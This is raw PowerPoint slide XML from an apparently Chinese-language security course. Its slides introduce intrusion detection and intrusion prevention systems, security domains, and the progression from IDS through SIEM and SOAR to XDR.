                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>安全事件分析（重点）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="77" name="组合 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2648985B-9974-BC7A-44D4-C7F232A6B9AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="78" name="图片 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C908C8E-0148-340D-FC2B-A3EF8BA0D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 y="3854"/>
                <a:ext cx="1508" cy="1508"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="79" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5E8E7C-A778-D884-F812-057B6436A143}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                        <a:schemeClr val="dk1">
                          <a:alpha val="40000"/>
                        </a:schemeClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="文本框 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0205085E-0C79-4E95-4E6C-70C1AE4DFC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412461" y="5083699"/>
            <a:ext cx="9223244" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>从总体和趋势上的分析能力是其他安全设备难以实现的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>同时，通过基于流量、统计等方面的分析，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>理论上拥有在未知攻击特别是蠕虫类攻击爆发时进行预警的能力</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76AEA372-4EDD-D457-D24C-CEB638F09212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5697130" y="4627380"/>
            <a:ext cx="1039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r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全域</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7260BDC1-06CE-10E8-6E46-5DCF7458A637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9387545" y="4461584"/>
            <a:ext cx="1021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eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全域</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772E8ECF-34B9-2248-65EB-F47149B33E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4277240" y="2001710"/>
            <a:ext cx="6602081" cy="2629399"/>
            <a:chOff x="521" y="958"/>
            <a:chExt cx="3916" cy="1498"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Picture 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69ABB5B4-6026-4B34-CDB4-AA7437EA51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 y="1313"/>
              <a:ext cx="1875" cy="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5" name="Picture 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0886B7AC-897A-C7E7-ABF1-6B0B3E79A9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2" y="1422"/>
              <a:ext cx="1285"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64" name="直接连接符 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0BFC4-9770-EA19-2373-BC02598EF777}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2290" y="1725"/>
              <a:ext cx="901" cy="16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65" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927888D3-E9B0-2465-13DB-37B45D7DDCB6}"/>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 y="1625"/>
              <a:ext cx="24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44" descr="BBSM">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C0EE9C-7377-729C-D83A-D3EB251935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 y="2051"/>
              <a:ext cx="28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4" descr="BBSM">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8117B027-BB30-4565-619D-C7D0206944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 y="1725"/>
              <a:ext cx="28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4" descr="BBSM">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268DDE6D-948E-9B7F-66AE-4005AD993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8" y="2174"/>
              <a:ext cx="28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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B62F4AA-82A5-62D3-5173-8CB46DF1637C}"/>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22" y="1775"/>
              <a:ext cx="37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直接连接符 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9201DF23-405E-8D83-46FE-1A5A3FFF3798}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1020" y="1935"/>
              <a:ext cx="341" cy="18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3" name="直接连接符 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327EDB2A-40AF-9D24-1CD0-CE7C60370449}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1020" y="1786"/>
              <a:ext cx="341" cy="1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4" name="直接连接符 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BECB1E35-A4BB-E0E0-E2C0-28FFB45FE411}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1565" y="1979"/>
              <a:ext cx="343" cy="20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5" name="直接连接符 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57ABBF3-CAB2-FF8D-0BF9-859BCE0331CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1565" y="1848"/>
              <a:ext cx="452" cy="3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6" name="直接连接符 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D9882F-EA5E-34A0-3095-24F5C10E6889}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1474" y="1223"/>
              <a:ext cx="3" cy="402"/>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87" name="矩形 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607BE956-2575-185F-798A-8110862188D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1232" y="958"/>
              <a:ext cx="453" cy="272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>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4"/>
                </a:buBlip>
                <a:defRPr kumimoji="1" sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="333399"/>
                  </a:solidFill>
                  <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49"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Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="88" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F66EC7D7-9CD4-940B-4E8B-37EC084BB538}"/>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9" y="1389"/>
              <a:ext cx="24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4" descr="BBSM">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE93021A-833D-F3CB-E512-9E62A1E726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5" y="1958"/>
              <a:ext cx="28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4" descr="BBSM">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01523A98-C454-E41A-EA64-F2EE3D41E6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9" y="1938"/>
              <a:ext cx="28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直接连接符 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969339ED-70EA-F39C-E183-65AA95BE0FDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3560" y="1670"/>
              <a:ext cx="281" cy="309"/>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92" name="直接连接符 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4A1376-AFB0-82DF-A730-B38DA48F69B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3470" y="1625"/>
              <a:ext cx="341" cy="81"/>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93" name="直接连接符 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D8DCE4-916C-2217-319B-ACCCAAD9BB21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3878" y="1731"/>
              <a:ext cx="343" cy="20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94" name="Picture 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6148ED-3E83-F2CC-E12C-5EC1F76C84B7}"/>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59" y="1612"/>
              <a:ext cx="37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5" name="直接连接符 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFBB4BE-3D35-18A1-6D80-F6AE58171825}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1655" y="1094"/>
              <a:ext cx="2236" cy="330"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA82144-84C8-F66C-96DA-457530520AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="7920000" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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IDS</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能够解决的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD49CA4C-B819-487F-91B4-673AC63DB4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>入侵防御系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IPS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1480245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发展史：</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IDS-&gt;SIEM-&gt;SOAR-&gt;XDR</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79692" y="1853949"/>
            <a:ext cx="12032615" cy="144653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sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全信息和事件管理</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> (SIEM) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：收集、汇总、分析、存储和报告整个组织不同源安全日志，用于事件响应取证和合规性</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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全编排、自动化和响应 (SOAR) ：通过丰富数据、改进警报分类和自动执行重复性任务来改进 SOC 流程</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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>扩展检测和响应 (XDR)：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>跨多个安全层收集并自动关联信息以实现快速威胁检测的方法，结合了安全信息和事件管理（SIEM</a:t>
            </a:r>
            <a:r>
